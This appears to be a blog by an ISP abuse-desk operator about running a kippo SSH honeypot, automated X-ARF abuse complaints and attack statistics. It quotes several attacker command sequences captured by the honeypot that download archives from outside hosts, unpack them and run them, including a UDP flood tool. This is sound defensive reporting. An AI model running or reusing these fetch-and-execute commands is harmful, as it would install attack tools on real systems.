spamversand

One recent reply to a kippo-attack complaint explained that the attacking ip is a TOR exit node.

Of course there is no way for us to find the real attacker when he/she is using TOR

for making this attack. Sad that this important service is abused in this way.

The system you have identified (cs-tor.bu.edu / 204.8.156.142) is an exit node on the Tor network. Tor is a distributed cryptographic anonymizing proxy service. The network traffic you detected was merely relayed through this system, and did not originate there. It is not possible to trace these connections back to their original source.

The automatic complaint-mechanism is now active. A X-ARF complaint is generated
for each session where a successful login into the kippo-honeypot produced some
recorded commands. The email address where the complaint is sent to is generated
like always – check own database, check ripe-website and check abusix.
Here is an example of the second mime-part:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"

—
Reported-From: spamtrap@netcologne.de
Category: abuse
Report-Type: login-attack
Destination-System: kippo – sshd honeypot
User-Agent: PHREAK 1.3
Report-ID: 2faf4f486d7f11e18949797f346be17f@netcologne.de
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json
Version: 1.0.1

and the third MIME-part looks like this:


MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"

recorded commands during this session:

w
uname -a
wget http://root-arhive.at.ua/flood/udp.tgz
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *
–===============0648269240==–

I am pretty close to start sending out complaints
for successful sshd – logins on my kippo honeypot.
The X-ARF part is ready. I decided to add the recorded
commands in the 3rd MIME-part. The ttylog could also
be useful, but the receiver of the complaint is probably
not so interested in starting the playlog utility for
each complaint.
I still need to implement a database check so that receivers
only get a handful complaints and are not overwhelmed by the
number of complaints..
Additionally the catched ips will be added in our blacklist,
just like in the attacks cachted by nepenthes.
Dionaea-attacks will come next 🙂

Today I received a notification from projecthoneypot.org
that one of my donated spamtrap-domains helped to catch a new
harvester. Feels good to be able to help 🙂

After trying to build some nice graphs for the kippo-honeypot with PyCha I found

this little toolbox making things way better than I did:

kippo-graph Homepage (link fixed)

Here are the first results from my honeypot: (no live db-queries made, so Inputs
are not visible right now) Kippo-Stats

The kippo honeypot is now running for about a week..

Up to now I have seen

* more than 1.3 Million Connects

* more than 7.100 successful logins

* > 2.200 commands typed

* more than 2.100 different Source IP addresses

* 178 Files uploaded, most of them psyBNC bouncers

Whow.. I expected *some* brute-force atempts, but that much?

The sshd – honeypot named kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after having success, but some are downloading files and try to do “things”:

-rw——- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw——- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg

coming from commands like:

CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go

I will try to build some public stats later..